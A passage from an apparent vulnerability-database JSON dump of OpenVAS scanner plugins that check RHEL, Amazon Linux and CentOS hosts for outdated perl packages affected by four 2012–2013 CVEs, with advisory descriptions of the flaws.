= isrpmvuln(pkg:\"perl-ExtUtils-ParseXS\", rpm:\"perl-ExtUtils-ParseXS~2.2003.0~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-File-Fetch\", rpm:\"perl-File-Fetch~0.26~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-IO-Compress-Base\", rpm:\"perl-IO-Compress-Base~2.020~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-IO-Compress-Bzip2\", rpm:\"perl-IO-Compress-Bzip2~2.020~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-IO-Compress-Zlib\", rpm:\"perl-IO-Compress-Zlib~2.020~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-IO-Zlib\", rpm:\"perl-IO-Zlib~1.09~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-IPC-Cmd\", rpm:\"perl-IPC-Cmd~0.56~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Locale-Maketext-Simple\", rpm:\"perl-Locale-Maketext-Simple~0.18~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Log-Message\", rpm:\"perl-Log-Message~0.02~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Log-Message-Simple\", rpm:\"perl-Log-Message-Simple~0.04~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Module-Build\", rpm:\"perl-Module-Build~0.3500~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Module-CoreList\", rpm:\"perl-Module-CoreList~2.18~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Module-Load\", rpm:\"perl-Module-Load~0.16~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Module-Load-Conditional\", rpm:\"perl-Module-Load-Conditional~0.30~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Module-Loaded\", rpm:\"perl-Module-Loaded~0.02~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Module-Pluggable\", rpm:\"perl-Module-Pluggable~3.90~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Object-Accessor\", rpm:\"perl-Object-Accessor~0.34~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Package-Constants\", rpm:\"perl-Package-Constants~0.02~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Params-Check\", rpm:\"perl-Params-Check~0.26~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Parse-CPAN-Meta\", rpm:\"perl-Parse-CPAN-Meta~1.40~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Pod-Escapes\", rpm:\"perl-Pod-Escapes~1.04~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Pod-Simple\", rpm:\"perl-Pod-Simple~3.13~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Term-UI\", rpm:\"perl-Term-UI~0.20~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Test-Harness\", rpm:\"perl-Test-Harness~3.17~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Test-Simple\", rpm:\"perl-Test-Simple~0.92~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Time-HiRes\", rpm:\"perl-Time-HiRes~1.9721~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Time-Piece\", rpm:\"perl-Time-Piece~1.15~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-core\", rpm:\"perl-core~5.10.1~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-debuginfo\", rpm:\"perl-debuginfo~5.10.1~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-devel\", rpm:\"perl-devel~5.10.1~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-libs\", rpm:\"perl-libs~5.10.1~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-parent\", rpm:\"perl-parent~0.221~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-suidperl\", rpm:\"perl-suidperl~5.10.1~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-version\", rpm:\"perl-version~0.77~130.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"perl\", rpm:\"perl~5.8.8~40.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-debuginfo\", rpm:\"perl-debuginfo~5.8.8~40.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-suidperl\", rpm:\"perl-suidperl~5.8.8~40.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-17T23:01:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5195", "CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120561", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120561", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2013-177)", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120561\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:29:37 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2013-177)\");\n script_tag(name:\"insight\", value:\"Multiple flaws were found in Perl. Please see the references for more information.\");\n script_tag(name:\"solution\", value:\"Run yum update perl to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2013-177.html\");\n script_cve_id(\"CVE-2012-6329\", \"CVE-2013-1667\", \"CVE-2012-5526\", \"CVE-2012-5195\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"perl-suidperl\", rpm:\"perl-suidperl~5.10.1~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Pod-Escapes\", rpm:\"perl-Pod-Escapes~1.04~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-libs\", rpm:\"perl-libs~5.10.1~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-version\", rpm:\"perl-version~0.77~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-IO-Compress-Base\", rpm:\"perl-IO-Compress-Base~2.020~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Archive-Tar\", rpm:\"perl-Archive-Tar~1.58~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Test-Harness\", rpm:\"perl-Test-Harness~3.17~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Module-Load\", rpm:\"perl-Module-Load~0.16~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Compress-Raw-Bzip2\", rpm:\"perl-Compress-Raw-Bzip2~2.020~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Archive-Extract\", rpm:\"perl-Archive-Extract~0.38~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-IO-Compress-Bzip2\", rpm:\"perl-IO-Compress-Bzip2~2.020~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-IPC-Cmd\", rpm:\"perl-IPC-Cmd~0.56~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-CGI\", rpm:\"perl-CGI~3.51~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Term-UI\", rpm:\"perl-Term-UI~0.20~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl\", rpm:\"perl~5.10.1~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-ExtUtils-CBuilder\", rpm:\"perl-ExtUtils-CBuilder~0.27~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Package-Constants\", rpm:\"perl-Package-Constants~0.02~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Module-Loaded\", rpm:\"perl-Module-Loaded~0.02~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-core\", rpm:\"perl-core~5.10.1~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Object-Accessor\", rpm:\"perl-Object-Accessor~0.34~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Compress-Raw-Zlib\", rpm:\"perl-Compress-Raw-Zlib~2.023~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-devel\", rpm:\"perl-devel~5.10.1~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Module-CoreList\", rpm:\"perl-Module-CoreList~2.18~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Test-Simple\", rpm:\"perl-Test-Simple~0.92~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-debuginfo\", rpm:\"perl-debuginfo~5.10.1~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Locale-Maketext-Simple\", rpm:\"perl-Locale-Maketext-Simple~0.18~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-CPANPLUS\", rpm:\"perl-CPANPLUS~0.88~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Parse-CPAN-Meta\", rpm:\"perl-Parse-CPAN-Meta~1.40~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-IO-Zlib\", rpm:\"perl-IO-Zlib~1.09~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-ExtUtils-Embed\", rpm:\"perl-ExtUtils-Embed~1.28~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Digest-SHA\", rpm:\"perl-Digest-SHA~5.47~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Compress-Zlib\", rpm:\"perl-Compress-Zlib~2.020~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Params-Check\", rpm:\"perl-Params-Check~0.26~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Time-HiRes\", rpm:\"perl-Time-HiRes~1.9721~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Module-Build\", rpm:\"perl-Module-Build~0.3500~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Time-Piece\", rpm:\"perl-Time-Piece~1.15~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Log-Message\", rpm:\"perl-Log-Message~0.02~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Module-Pluggable\", rpm:\"perl-Module-Pluggable~3.90~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-CPAN\", rpm:\"perl-CPAN~1.9402~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-ExtUtils-ParseXS\", rpm:\"perl-ExtUtils-ParseXS~2.2003.0~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Log-Message-Simple\", rpm:\"perl-Log-Message-Simple~0.04~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Pod-Simple\", rpm:\"perl-Pod-Simple~3.13~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-ExtUtils-MakeMaker\", rpm:\"perl-ExtUtils-MakeMaker~6.55~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Module-Load-Conditional\", rpm:\"perl-Module-Load-Conditional~0.30~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-IO-Compress-Zlib\", rpm:\"perl-IO-Compress-Zlib~2.020~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-parent\", rpm:\"perl-parent~0.221~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-File-Fetch\", rpm:\"perl-File-Fetch~0.26~130.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-19T15:08:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5195", "CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329"], "description": "Check for the Version of perl", "modified": "2018-01-19T00:00:00", "published": "2013-03-28T00:00:00", "id": "OPENVAS:881698", "href": "http://plugins.openvas.org/nasl.php?oid=881698", "type": "openvas", "title": "CentOS Update for perl CESA-2013:0685 centos6 ", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for perl CESA-2013:0685 centos6 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Perl is a high-level programming language commonly used for system\n administration utilities and web programming.\n\n A heap overflow flaw was found in Perl. If a Perl application allowed\n user input to control the count argument of the string repeat operator, an\n attacker could cause the application to crash or, potentially, execute\n arbitrary code with the privileges of the user running the application.\n (CVE-2012-5195)\n \n A denial of service flaw was found in the way Perl's rehashing code\n implementation, responsible for recalculation of hash keys and\n redistribution of hash content, handled certain input. If an attacker\n supplied specially-crafted input to be used as hash keys by a Perl\n application, it could cause excessive memory consumption. (CVE-2013-1667)\n \n It was found that the Perl CGI module, used to handle Common Gateway\n Interface requests and responses, incorrectly sanitized the values for\n Set-Cookie and P3P headers. If a Perl application using the CGI module\n reused cookies values and accepted untrusted input from web browsers, a\n remote attacker could use this flaw to alter member items of the cookie or\n add new items. (CVE-2012-5526)\n \n It was found that the Perl Locale::Maketext module, used to localize Perl\n applications, did not properly handle backslashes or fully-qualified method\n names. An attacker could possibly use this flaw to execute arbitrary Perl\n code with the privileges of a Perl application that uses untrusted\n Locale::Maketext templates. (CVE-2012-6329)\n \n Red Hat would like to thank the Perl project for reporting CVE-2012-5195\n and CVE-2013-1667. Upstream acknowledges Tim Brown as the original\n reporter of CVE-2012-5195 and Yves Orton as the original reporter of\n CVE-2013-1667.\n \n All Perl users should upgrade to these updated packages, which contain\n backported patches to correct these issues. All running Perl programs\n must be restarted for this update to take effect.\";\n\n\ntag_solution = \"Please Install the Updated Packages.\";\ntag_affected = \"perl on CentOS 6\";\n\n\n\n\nif(description)\n{\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2013-March/019669.html\");\n script_id(881698);\n script_version(\"$Revision: 8466 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-19 07:58:30 +0100 (Fri, 19 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-28 09:49:31 +0530 (Thu, 28 Mar 2013)\");\n script_cve_id(\"CVE-2012-5195\", \"CVE-2012-5526\", \"CVE-2012-6329\", \"CVE-2013-1667\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"CESA\", value: \"2013:0685\");\n script_name(\"CentOS Update for perl CESA-2013:0685 centos6 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of perl\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"perl\", rpm:\"perl~5.10.1~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Archive-Extract\", rpm:\"perl-Archive-Extract~0.38~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Archive-Tar\", rpm:\"perl-Archive-Tar~1.58~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-CGI\", rpm:\"perl-CGI~3.51~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Compress-Raw-Bzip2\", rpm:\"perl-Compress-Raw-Bzip2~2.020~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Compress-Raw-Zlib\", rpm:\"perl-Compress-Raw-Zlib~2.020~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Compress-Zlib\", rpm:\"perl-Compress-Zlib~2.020~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-core\", rpm:\"perl-core~5.10.1~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-CPAN\", rpm:\"perl-CPAN~1.9402~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-CPANPLUS\", rpm:\"perl-CPANPLUS~0.88~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-devel\", rpm:\"perl-devel~5.10.1~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Digest-SHA\", rpm:\"perl-Digest-SHA~5.47~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-ExtUtils-CBuilder\", rpm:\"perl-ExtUtils-CBuilder~0.27~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-ExtUtils-Embed\", rpm:\"perl-ExtUtils-Embed~1.28~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-ExtUtils-MakeMaker\", rpm:\"perl-ExtUtils-MakeMaker~6.55~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-ExtUtils-ParseXS\", rpm:\"perl-ExtUtils-ParseXS~2.2003.0~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-File-Fetch\", rpm:\"perl-File-Fetch~0.26~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-IO-Compress-Base\", rpm:\"perl-IO-Compress-Base~2.020~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-IO-Compress-Bzip2\", rpm:\"perl-IO-Compress-Bzip2~2.020~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-IO-Compress-Zlib\", rpm:\"perl-IO-Compress-Zlib~2.020~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-IO-Zlib\", rpm:\"perl-IO-Zlib~1.09~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-IPC-Cmd\", rpm:\"perl-IPC-Cmd~0.56~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-libs\", rpm:\"perl-libs~5.10.1~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Locale-Maketext-Simple\", rpm:\"perl-Locale-Maketext-Simple~0.18~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Log-Message\", rpm:\"perl-Log-Message~0.02~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-Log-Message-Simple\", rpm:\"perl-Log-Message-Simple~0.04~130.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 